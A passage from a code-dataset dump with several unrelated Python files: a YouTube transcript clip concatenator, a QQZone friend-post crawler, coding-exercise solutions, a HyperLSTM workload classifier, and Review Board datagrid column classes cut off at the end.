'lebron1.mp4', 'text': 'trajectory of his shot', 'start': 285.84, 'duration': 5.12}]}\n use_random_version (boolean): specifies if a random clip should be chosen for multiple of the same word\n specified_versions (list): index of each clip when there are multiple of the same word \n \n Returns:\n clip_info (list) : a list of tuples where each element is (video_file, (start_time, end_time))\n specifieds (list): index of each clip chosen there are multiple of the same word \n \"\"\"\n clip_info = []\n \n if use_random_version: \n specifieds = []\n else:\n specifieds = specified_versions\n \n count = 0\n for word in phrase.split():\n assert word in word_mapping, word + \" is not contained in the given videos\"\n if (use_random_version):\n version_index = random.randint(0,len(word_mapping[word])-1)\n specifieds.append(version_index)\n else:\n version_index = specified_versions[count]\n \n entry = word_mapping[word][version_index]\n clip_info.append( (entry['video'],(entry['start'],entry['duration'])) )\n count += 1\n \n return clip_info, specifieds\n\ndef get_word_mapping_from_transcripts(youtube_ids):\n \"\"\"\n Creates a dictionary mapping individual words to transcript phrases\n \n Parameter:\n youtube_ids (dict): maps video filenames to youtube IDs\n \n Returns:\n word_mapping (dict): keys are individual words that map to a a list of transcript phrase.\n For example {'trajectory' : [{'video': 'lebron1.mp4', 'text': 'trajectory of his shot', 'start': 285.84, 'duration': 5.12}]}\n \"\"\"\n word_mapping = {}\n \n for filename, ID in youtube_ids.items():\n current_transcript = YouTubeTranscriptApi.get_transcript(ID)\n for phrase in current_transcript:\n for word in set(phrase['text'].split()):\n if word in word_mapping.keys():\n new_phrase = {'video':filename, 'text':phrase['text'], 'start':phrase['start'], 'duration':phrase['duration']}\n word_mapping[word].append(new_phrase)\n else:\n word_mapping[word] = [{'video':filename, 'text':phrase['text'], 'start':phrase['start'], 'duration':phrase['duration']}]\n \n return word_mapping\n\n","repo_name":"bbartschi14/narrative_concatenator","sub_path":"video_transcripts.py","file_name":"video_transcripts.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4579365335","text":"from src.spider.QQZoneFriendSpider import QQZoneFriendSpider\nimport json\nfrom urllib import parse\nfrom src.util.constant import BASE_DIR\nfrom copy import deepcopy\n\nclass QQZoneFriendMoodSpider(QQZoneFriendSpider):\n \"\"\"\n 爬取指定好友的动态\n \"\"\"\n def __init__(self, use_redis=False, debug=False, analysis=True, recover=False,\n username='', mood_begin=0, mood_num=-1, stop_time='-1', from_web=False, nickname='', no_delete=True, cookie_text='',\n export_excel=False, export_csv = True, pool_flag='127.0.0.1',\n download_small_image=False, download_big_image=False,\n download_mood_detail=True, download_like_detail=True, download_like_names=True):\n QQZoneFriendSpider.__init__(self, use_redis=use_redis, debug=debug, username=username, export_csv=export_csv,\n mood_begin=mood_begin, mood_num=mood_num, stop_time=stop_time, from_web=from_web,\n download_small_image=download_small_image, download_big_image=download_big_image,\n download_mood_detail=download_mood_detail, download_like_detail=download_like_detail,\n download_like_names=download_like_names, nickname=nickname, no_delete=no_delete, cookie_text=cookie_text,\n recover=recover, export_excel=export_excel, pool_flag=pool_flag, analysis=analysis)\n if not self.from_web:\n self.friend_name_list = self.get_friend_username()\n else:\n self.friend_name_list = []\n self.base_dir = ''\n\n def get_friend_username(self):\n config_path = BASE_DIR + 'config/friend_info.json'\n try:\n with open(config_path, 'r', encoding='utf-8') as r:\n friend_info = json.load(r)\n return friend_info\n except BaseException as e:\n self.format_error(e, \"friend_info.json does not exist!\")\n exit(1)\n\n def change_username(self, friend_qq, nick_name):\n self.username = friend_qq\n self.nickname = nick_name\n self.mood_host = self.http_host + '/' + self.username + '/mood/'\n self.init_file_name()\n self.init_parameter()\n\n # 构造点赞的人的URL,好友的点赞url与自己的url不一样\n def get_aggree_url(self, unikey):\n url = 'https://user.qzone.qq.com/proxy/domain/users.qzone.qq.com/cgi-bin/likes/get_like_list_app?'\n params = {\n \"uin\": self.raw_username,\n \"unikey\": unikey,\n \"begin_uin\": 0,\n \"query_count\": 60,\n \"if_first_page\": 1,\n \"g_tk\": self.g_tk,\n }\n url = url + parse.urlencode(params)\n return url\n\n def get_friend_mood(self, friend_qq='', nick_name='佚名', mood_num = -1):\n \"\"\"\n\n :param friend_qq:\n :param nick_name:\n :param mood_num: 此处mood num的优先级比较高\n :return:\n \"\"\"\n if self.g_tk == 0:\n # self.login()\n self.login_with_qr_code()\n if friend_qq != '':\n print(\"因传入参数不为空,所以舍弃配置文件friend_info.json的内容\")\n self.friend_name_list.clear()\n self.friend_name_list.append(dict(friend_qq=friend_qq, nick_name=nick_name))\n for friend in self.friend_name_list:\n if mood_num != -1:\n self.mood_num = mood_num\n print(\"begin to capture:\", friend['friend_qq'])\n self.change_username(friend['friend_qq'], friend['nick_name'])\n # 重新初始化参数\n self.init_parameter()\n\n self.init_file_name()\n\n self.get_mood_list()\n self.mood_num = -1\n\n def reset_username(self):\n \"\"\"\n 重置用户名昵称和文件名\n :return:\n \"\"\"\n self.username = deepcopy(self.raw_username)\n self.nickname = deepcopy(self.raw_nickname)\n self.mood_host = self.http_host + '/' + self.username + '/mood/'\n self.init_file_name()\n self.init_parameter()\n\nif __name__ == '__main__':\n qqfriend = QQZoneFriendMoodSpider(use_redis=False, debug=False, mood_begin=0, mood_num=500,\n stop_time='2014-06-01',\n download_small_image=False, download_big_image=False,\n download_mood_detail=True, download_like_detail=True, download_like_names=True,\n recover=False)\n qqfriend.get_friend_mood()\n","repo_name":"Maicius/QQZoneMood","sub_path":"src/spider/QQZoneFriendMoodSpider.py","file_name":"QQZoneFriendMoodSpider.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"34"} +{"seq_id":"4324611446","text":"from collections import defaultdict\n# A[P] + A[P+1] + ... + A[Q]\n#(3, 4) is a slice of A that has sum 4,\n#(2, 2) is a slice of A that has sum −6,\n#(0, 1) is a slice of A that has sum 5,\n#no other slice of A has sum greater than (0, 1).\n\ndef solution(A):\n s=set()\n P=0\n Q=0\n max=0\n for P in range(0, len(A)):\n for Q in range(0, len(A)):\n print(\"A[P:Q] {} sum {}\".format(A[P:Q],sum(A[P:Q]) ))\n if max < sum(A[P:Q]):\n max = sum(A[P:Q])\n return max\n\n# [0 1 2 3 4]\nA=[3,2,-6,4,0]\nprint(solution(A))","repo_name":"miko73/codity","sub_path":"MaxSlice.py","file_name":"MaxSlice.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7751459063","text":"from torch import nn\nfrom torch.nn import init\nimport sys \n\nsys.path.append('C:/driver_workload/attention-hyperlstm-classification')\nsys.path.append('C:/driver_workload/attention-hyperlstm-classification/models') \n\nfrom models.hyperlstm import HyperLSTMCell, LSTMCell\n\nclass RecModel(nn.Module):\n\n def __init__(self, rnn_type, input_size, hidden_size, \n hyper_hidden_size, hyper_embedding_size,\n use_layer_norm, dropout_prob, output_size):\n super().__init__()\n\n self.rnn_type = rnn_type\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.hyper_hidden_size = hyper_hidden_size\n self.hyper_embedding_size = hyper_embedding_size\n self.use_layer_norm = use_layer_norm\n self.dropout_prob = dropout_prob\n self.output_size = output_size\n \n if rnn_type == 'hyperlstm':\n self.rnn_cell = HyperLSTMCell(\n input_size=input_size, \n hidden_size=hidden_size,\n hyper_hidden_size=hyper_hidden_size,\n hyper_embedding_size=hyper_embedding_size,\n use_layer_norm=use_layer_norm, \n dropout_prob=dropout_prob)\n elif rnn_type == 'lstm':\n self.rnn_cell = LSTMCell(\n input_size=input_size, \n hidden_size=hidden_size,\n use_layer_norm=use_layer_norm,\n dropout_prob=dropout_prob)\n else:\n raise ValueError('Unknown RNN type')\n self.output_proj = nn.Linear(in_features=hidden_size,\n out_features=output_size)\n self.dropout = nn.Dropout(dropout_prob)\n self.reset_parameters()\n\n def reset_parameters(self):\n self.rnn_cell.reset_parameters()\n init.xavier_uniform_(self.output_proj.weight.data)\n init.constant_(self.output_proj.bias.data, val=0)\n\n def forward(self, inputs, state, hyper_state=None):\n inputs_emb = inputs\n max_length = inputs.size(1)\n\n rnn_outputs = []\n for t in range(max_length):\n if self.rnn_type == 'hyperlstm':\n output, state, hyper_state = self.rnn_cell(\n x=inputs_emb[:,t], state=state, hyper_state=hyper_state)\n elif self.rnn_type == 'lstm':\n output, state = self.rnn_cell.forward(\n x=inputs_emb[:,t], state=state)\n else:\n raise ValueError('Unknown RNN type')\n rnn_outputs.append(output)\n # rnn_outputs.append(self.output_proj(output))\n \n rnn_outputs = rnn_outputs[-1]\n\n logits = self.output_proj(rnn_outputs)\n # logits = rnn_outputs\n \n return rnn_outputs, logits, state, hyper_state\n","repo_name":"yhh-IV/Driver-Workload-Recognition","sub_path":"attention-hyperlstm-classification/workload_classification/model_workload_att.py","file_name":"model_workload_att.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"31669002223","text":"def check_prime(n):\n if n == 1:\n return False\n else:\n for i in range(2, int((n**0.5))+1):\n if n % i == 0:\n return False\n return True\n\ndef binary_transform(num, base):\n lib = '0123456789ABCDEF'\n q, r = divmod(num, base)\n return binary_transform(q, base) + lib[r] if q else lib[r]\n\n\n# 소수 양 옆의 0 은 무시 가능 & 101 등 0이 가운데 껴있으면 소수 아님\ndef solution(n, k):\n if k != 10:\n trans = str(binary_transform(n,k))\n else:\n trans = str(n)\n nums = list(trans.split('0'))\n while '' in nums: # split('0') 까지만하면 중간에 0이 여러개인 경우 ''가 들어감\n nums.remove('')\n answer = 0\n\n for num in nums:\n if check_prime(int(num)):\n answer += 1\n return answer\n#n = 110011\n#k = 10\n#print(solution(n,k))","repo_name":"myone2e/programmers","sub_path":"kakao/2022_blind/q2_prime_in_kbit_binary.py","file_name":"q2_prime_in_kbit_binary.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4591448815","text":"from functools import reduce\n\nfrom django.template.defaultfilters import date\nfrom django.urls import NoReverseMatch\nfrom django.utils.html import (conditional_escape, escape, format_html,\n format_html_join)\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext_lazy as _, gettext, ngettext\nfrom djblets.datagrid.grids import CheckboxColumn, Column, DateTimeColumn\nfrom djblets.siteconfig.models import SiteConfiguration\n\nfrom reviewboard.accounts.models import ReviewRequestVisit\nfrom reviewboard.avatars import avatar_services\nfrom reviewboard.reviews.models import ReviewRequest\nfrom reviewboard.reviews.templatetags.reviewtags import render_star\nfrom reviewboard.site.urlresolvers import local_site_reverse\n\n\nclass BaseStarColumn(Column):\n \"\"\"Indicates if an item is starred.\n\n This is the base class for all columns that deal with starring items.\n\n The star is interactive, allowing the user to star or unstar the item.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(BaseStarColumn, self).__init__(\n image_class='rb-icon rb-icon-star-on',\n image_alt=_('Starred'),\n detailed_label=_('Starred'),\n shrink=True,\n *args, **kwargs)\n\n def setup_state(self, state):\n \"\"\"Set up the state for this column.\"\"\"\n state.all_starred = set()\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n obj.starred = obj.pk in state.all_starred\n return render_star(state.datagrid.request.user, obj)\n\n\nclass UsernameColumn(Column):\n \"\"\"A column for showing a username and the user's avatar.\n\n The username and avatar will link to the user's profile page and will\n show basic profile information when hovering over the link.\n\n When constructing an instance of this column, the relation between the\n object being represented in the datagrid and the user can be specified\n as a tuple or list of field names forming a path to the user field.\n \"\"\"\n\n AVATAR_SIZE = 24\n\n def __init__(self, label=_('Username'), user_relation=[], *args, **kwargs):\n \"\"\"Initialize the column.\n\n Args:\n label (unicode, optional):\n The label for the column.\n\n user_relation (list of unicode, optional):\n A list of fields forming a relation path to the user. This can\n be left blank if representing the user.\n\n *args (tuple):\n Additional positional arguments to pass to the column.\n\n **kwargs (dict):\n Additional keyword arguments to pass to the column.\n \"\"\"\n self._user_relation = user_relation\n\n super(UsernameColumn, self).__init__(\n label=label,\n db_field='__'.join(user_relation + ['username']),\n css_class='submitter-column',\n shrink=True,\n sortable=True,\n link=True,\n link_func=self._link_user,\n link_css_class='user',\n *args, **kwargs)\n\n def get_user(self, obj):\n \"\"\"Return the user associated with this object.\n\n Args:\n obj (object):\n The object provided to the column.\n\n Returns:\n django.contrib.auth.models.User:\n The resulting user.\n \"\"\"\n # Look up the user in the provided obj by traversing the relation.\n # If _user_relation is empty, then obj is the user.\n user = obj\n\n for field_name in self._user_relation:\n user = getattr(user, field_name)\n\n return user\n\n def render_data(self, state, obj):\n \"\"\"Render the user's name and avatar as HTML.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The column state.\n\n obj (django.db.models.Model):\n The object being rendered in the datagrid.\n\n Returns:\n django.utils.safestring.SafeText:\n The HTML for the column.\n \"\"\"\n user = self.get_user(obj)\n\n # If avatars are eanbled, we'll want to include that in the resulting\n # HTML.\n siteconfig = SiteConfiguration.objects.get_current()\n request = state.datagrid.request\n avatar_html = ''\n\n if siteconfig.get(avatar_services.AVATARS_ENABLED_KEY):\n avatar_service = avatar_services.for_user(user)\n\n if avatar_service:\n avatar_html = avatar_service.render(request=request,\n user=user,\n size=self.AVATAR_SIZE)\n\n # Render the link to the user page, using the avatar and username.\n username = user.username\n\n return format_html('{0}{1}', avatar_html, username)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\n\n This will select fields for the user and the user's profile, to\n help with query performance.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The column state.\n\n queryset (django.db.models.query.QuerySet):\n The queryset to augment.\n\n Returns:\n django.db.models.query.QuerySet:\n The resulting queryset.\n \"\"\"\n user_field = '__'.join(self._user_relation)\n\n if user_field:\n fields = [user_field, '%s__profile' % user_field]\n else:\n fields = ['profile']\n\n return queryset.select_related(*fields)\n\n def _link_user(self, state, obj, *args):\n \"\"\"Return the URL to link the user associated with this object.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn, unused):\n The column state.\n\n obj (object):\n The object provided to the column.\n\n *args (tuple):\n Additional keyword arguments provided to the method.\n\n Returns:\n unicode:\n The URL for the user.\n \"\"\"\n return local_site_reverse(\n 'user',\n request=state.datagrid.request,\n kwargs={\n 'username': self.get_user(obj).username,\n })\n\n\nclass FullNameColumn(Column):\n \"\"\"Shows the full name of the user when appropriate.\"\"\"\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\n\n This will select fields for the user and the user's profile, to\n help with query performance.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The column state.\n\n queryset (django.db.models.query.QuerySet):\n The queryset to augment.\n\n Returns:\n django.db.models.query.QuerySet:\n The resulting queryset.\n \"\"\"\n return queryset.select_related('profile')\n\n def render_data(self, state, user):\n \"\"\"Render the full name, or blank if not visible to the user.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The column state.\n\n user (django.contrib.auth.models.User):\n The user whose full name is to be rendered.\n\n Returns:\n unicode:\n Either the full name (if visible to the user) or an empty string.\n \"\"\"\n profile = user.get_profile()\n\n if user.is_profile_visible(state.datagrid.request.user):\n display_name = \\\n profile.get_display_name(state.datagrid.request.user)\n else:\n display_name = ''\n\n return escape(display_name)\n\n\nclass BugsColumn(Column):\n \"\"\"Shows the list of bugs specified on a review request.\n\n The list of bugs will be linked to the bug tracker, if a bug tracker\n was configured for the repository the review request's change is on.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n # Note that we're enabling linking but overriding the link function\n # to return None. This is to disable the automatic linking to the\n # review request, so that the cell isn't generally clickable,\n # preventing visual and interaction issues with the bug links.\n super(BugsColumn, self).__init__(\n label=_('Bugs'),\n css_class='bugs',\n link=False,\n shrink=True,\n sortable=False,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.select_related('repository')\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n bugs = review_request.get_bug_list()\n repository = review_request.repository\n local_site_name = None\n\n if review_request.local_site:\n local_site_name = review_request.local_site.name\n\n if repository and repository.bug_tracker:\n links = []\n\n for bug in bugs:\n try:\n url = local_site_reverse(\n 'bug_url',\n local_site_name=local_site_name,\n args=[review_request.display_id, bug])\n links.append(\n format_html('{1}',\n url, bug))\n except NoReverseMatch:\n links.append(escape(bug))\n\n return ', '.join(links)\n\n return format_html_join(\n ', ',\n '{0}',\n ((bug,) for bug in bugs)\n )\n\n\nclass ReviewRequestCheckboxColumn(CheckboxColumn):\n \"\"\"A column containing a check-box.\"\"\"\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n if self.is_selectable(state, obj):\n checked = ''\n\n if self.is_selected(state, obj):\n checked = 'checked=\"true\"'\n\n return (''\n % (obj.display_id, escape(self.checkbox_name), checked))\n else:\n return ''\n\n\nclass DateTimeSinceColumn(DateTimeColumn):\n \"\"\"Displays how long it has been since a given date/time.\n\n These columns will dynamically update as the page is shown, so that the\n number of minutes, hours, days, etc. ago is correct.\n \"\"\"\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return '' % (\n date(getattr(obj, self.field_name), 'c'),\n super(DateTimeSinceColumn, self).render_data(state, obj))\n\n\nclass DiffUpdatedColumn(DateTimeColumn):\n \"\"\"Shows the date/time that the diff was last updated.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(DiffUpdatedColumn, self).__init__(\n label=_('Diff Updated'),\n db_field='diffset_history__last_diff_updated',\n field_name='last_diff_updated',\n sortable=True,\n link=False,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.select_related('diffset_history')\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n if obj.diffset_history.last_diff_updated:\n return super(DiffUpdatedColumn, self).render_data(\n state, obj.diffset_history)\n else:\n return ''\n\n\nclass DiffUpdatedSinceColumn(DateTimeSinceColumn):\n \"\"\"Shows the elapsed time since the diff was last updated.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(DiffUpdatedSinceColumn, self).__init__(\n label=_('Diff Updated'),\n db_field='diffset_history__last_diff_updated',\n field_name='last_diff_updated',\n sortable=True,\n link=False,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.select_related('diffset_history')\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n if obj.diffset_history.last_diff_updated:\n return super(DiffUpdatedSinceColumn, self).render_data(\n state, obj.diffset_history)\n else:\n return ''\n\n\nclass GroupMemberCountColumn(Column):\n \"\"\"Shows the number of users that are part of a review group.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(GroupMemberCountColumn, self).__init__(\n link=True,\n link_func=self.link_to_object,\n *args, **kwargs)\n\n def render_data(self, state, group):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return str(group.users.count())\n\n def link_to_object(self, state, group, value):\n \"\"\"Return the link to the object in the column.\"\"\"\n return local_site_reverse('group-members',\n request=state.datagrid.request,\n args=[group.name])\n\n\nclass GroupsColumn(Column):\n \"\"\"Shows the list of groups requested to review the review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(GroupsColumn, self).__init__(\n label=_('Groups'),\n detailed_label=_('Target Groups'),\n sortable=False,\n shrink=False,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.prefetch_related('target_groups')\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n groups = review_request.target_groups.all()\n return reduce(lambda a, d: a + d.name + ' ', groups, '')\n\n\nclass MyCommentsColumn(Column):\n \"\"\"Shows if the current user has reviewed the review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(MyCommentsColumn, self).__init__(\n image_class='rb-icon rb-icon-datagrid-comment-draft',\n image_alt=_('My Comments'),\n detailed_label=_('My Comments'),\n shrink=True,\n *args, **kwargs)\n\n # XXX It'd be nice to be able to sort on this, but datagrids currently\n # can only sort based on stored (in the DB) values, not computed\n # values.\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_anonymous:\n return queryset\n\n query_dict = {\n 'user_id': str(user.id),\n }\n\n return queryset.extra(select={\n 'mycomments_my_reviews': \"\"\"\n SELECT COUNT(1)\n FROM reviews_review\n WHERE reviews_review.user_id = %(user_id)s\n AND reviews_review.review_request_id =\n reviews_reviewrequest.id\n \"\"\" % query_dict,\n 'mycomments_private_reviews': \"\"\"\n SELECT COUNT(1)\n FROM reviews_review\n WHERE reviews_review.user_id = %(user_id)s\n AND reviews_review.review_request_id =\n reviews_reviewrequest.id\n AND NOT reviews_review.public\n \"\"\" % query_dict,\n 'mycomments_shipit_reviews': \"\"\"\n SELECT COUNT(1)\n FROM reviews_review\n WHERE reviews_review.user_id = %(user_id)s\n AND reviews_review.review_request_id =\n reviews_reviewrequest.id\n AND reviews_review.ship_it\n \"\"\" % query_dict,\n })\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_anonymous or review_request.mycomments_my_reviews == 0:\n return ''\n\n # Priority is ranked in the following order:\n #\n # 1) Non-public (draft) reviews\n # 2) Public reviews marked \"Ship It\"\n # 3) Public reviews not marked \"Ship It\"\n if review_request.mycomments_private_reviews > 0:\n icon_class = 'rb-icon-datagrid-comment-draft'\n image_alt = _('Comments drafted')\n else:\n if review_request.mycomments_shipit_reviews > 0:\n icon_class = 'rb-icon-datagrid-comment-shipit'\n image_alt = _('Comments published. Ship it!')\n else:\n icon_class = 'rb-icon-datagrid-comment'\n image_alt = _('Comments published')\n\n return '
    ' % \\\n (icon_class, image_alt)\n\n\nclass NewUpdatesColumn(Column):\n \"\"\"Indicates if there are new updates on a review request.\n\n This will show an icon if the review request has had any new updates\n or reviews since the user last saw it.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(NewUpdatesColumn, self).__init__(\n image_class='rb-icon rb-icon-new-updates',\n image_alt=_('New Updates'),\n detailed_label=_('New Updates'),\n shrink=True,\n *args, **kwargs)\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n\n # Review requests for un-authenticated users will not contain the\n # new_review_count attribute, so confirm its existence before\n # attempting to access.\n if (hasattr(review_request, 'new_review_count') and\n review_request.new_review_count > 0):\n return '
    ' % \\\n (self.image_class, self.image_alt)\n\n return ''\n\n\nclass PendingCountColumn(Column):\n \"\"\"Shows the pending number of review requests for a user or group.\n\n This will show the pending number of review requests for the given\n review group or user. It only applies to group or user lists.\n \"\"\"\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return str(\n getattr(obj, self.field_name).filter(\n public=True, status='P').count())\n\n\nclass PeopleColumn(Column):\n \"\"\"Shows the list of people requested to review the review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(PeopleColumn, self).__init__(\n label=_('People'),\n detailed_label=_('Target People'),\n sortable=False,\n shrink=False,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.prefetch_related('target_people')\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n people = review_request.target_people.all()\n return reduce(lambda a, d: a + d.username + ' ', people, '')\n\n\nclass RepositoryColumn(Column):\n \"\"\"Shows the name of the repository the review request's change is on.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(RepositoryColumn, self).__init__(\n label=_('Repository'),\n db_field='repository__name',\n shrink=True,\n sortable=True,\n link=False,\n css_class='repository-column',\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.select_related('repository')\n\n def render_data(self, state, obj):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return super(RepositoryColumn, self).render_data(state, obj) or ''\n\n\nclass ReviewCountColumn(Column):\n \"\"\"Shows the number of published reviews for a review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(ReviewCountColumn, self).__init__(\n label=_('Reviews'),\n detailed_label=_('Number of Reviews'),\n shrink=True,\n link=True,\n link_func=self.link_to_object,\n *kwargs, **kwargs)\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return str(review_request.publicreviewcount_count)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.extra(select={\n 'publicreviewcount_count': \"\"\"\n SELECT COUNT(*)\n FROM reviews_review\n WHERE reviews_review.public\n AND reviews_review.base_reply_to_id is NULL\n AND reviews_review.review_request_id =\n reviews_reviewrequest.id\n \"\"\"\n })\n\n def link_to_object(self, state, review_request, value):\n \"\"\"Return the link to the object in the column.\"\"\"\n return '%s#last-review' % review_request.get_absolute_url()\n\n\nclass ReviewGroupStarColumn(BaseStarColumn):\n \"\"\"Indicates if a review group is starred.\n\n The star is interactive, allowing the user to star or unstar the group.\n \"\"\"\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_authenticated:\n state.all_starred = set(\n user.get_profile().starred_groups\n .filter(pk__in=state.datagrid.id_list)\n .values_list('pk', flat=True)\n )\n\n return queryset\n\n\nclass ReviewRequestIDColumn(Column):\n \"\"\"Displays the ID of the review request.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(ReviewRequestIDColumn, self).__init__(\n label=_('ID'),\n detailed_label=_('Review Request ID'),\n shrink=True,\n link=True,\n sortable=True,\n *args, **kwargs)\n\n def get_sort_field(self, state):\n \"\"\"Return the model field for sorting this column.\"\"\"\n if state.datagrid.local_site:\n return 'local_id'\n else:\n return 'id'\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return review_request.display_id\n\n\nclass ReviewRequestStarColumn(BaseStarColumn):\n \"\"\"Indicates if a review request is starred.\n\n The star is interactive, allowing the user to star or unstar the\n review request.\n \"\"\"\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_authenticated:\n state.all_starred = set(\n user.get_profile().starred_review_requests\n .filter(pk__in=state.datagrid.id_list)\n .values_list('pk', flat=True)\n )\n\n return queryset\n\n\nclass ShipItColumn(Column):\n \"\"\"Shows the \"Ship It\" and issue counts for a review request.\n\n If there are any issues still to resolve or verify, this will instead show\n information on those issues. Otherwise, it will show information on the\n number of Ship It! reviews filed.\n\n The following is the order of priority in which information is shown:\n\n 1. Open issues with issues requiring verification\n 2. Open issues\n 3. Issues requiring verification\n 4. Ship It! counts\n\n If showing a Ship It!, and if the latest review is older than the last\n update on the review request, the Ship It! will be marked as stale,\n helping visually indicate that it may need a re-review. The ARIA label\n reflects this as well.\n\n Version Changed:\n 5.0:\n * Added ARIA attributes for the displayed output.\n * Ship It! counts are now shown as stale if older than the latest\n update to the review request.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\n\n Args:\n *args (tuple):\n Additional arguments to pass to the parent constructor.\n\n **kwargs (dict):\n Additional keyword arguments to pass to the parent constructor.\n \"\"\"\n super(ShipItColumn, self).__init__(\n image_class='rb-icon rb-icon-datagrid-column-shipits-issues',\n image_alt=_('Ship It!/Issue Counts'),\n detailed_label=_('Ship It!/Issue Counts'),\n db_field='shipit_count',\n sortable=True,\n shrink=True,\n *args, **kwargs)\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The state for the datagrid.\n\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request.\n\n Returns:\n django.utils.safestring.SafeText:\n The rendered HTML for the column.\n \"\"\"\n open_issues = review_request.issue_open_count\n verifying_issues = review_request.issue_verifying_count\n\n if open_issues > 0 and verifying_issues > 0:\n return self._render_counts(\n [\n {\n 'count': open_issues,\n 'title': _('Open issue count'),\n },\n {\n 'count': verifying_issues,\n 'css_class': 'issue-verifying-count',\n 'icon_name': 'issue-verifying',\n 'title': _('Verifying issue count'),\n },\n ],\n aria_label=(\n ngettext(\n '%(open_issue_count)d issue opened, '\n '%(verifying_issue_count)d requiring verification',\n '%(open_issue_count)d issues opened, '\n '%(verifying_issue_count)d requiring verification',\n open_issues)\n % {\n 'open_issue_count': open_issues,\n 'verifying_issue_count': verifying_issues,\n }\n ))\n elif open_issues > 0:\n return self._render_counts(\n [{\n 'count': open_issues,\n }],\n aria_label=(\n ngettext(\n '%(open_issue_count)d issue opened',\n '%(open_issue_count)d issues opened',\n open_issues)\n % {\n 'open_issue_count': open_issues,\n }\n ))\n elif verifying_issues > 0:\n return self._render_counts(\n [{\n 'count': verifying_issues,\n 'icon_name': 'issue-verifying',\n }],\n aria_label=(\n ngettext(\n '%(verifying_issue_count)d issue requiring '\n 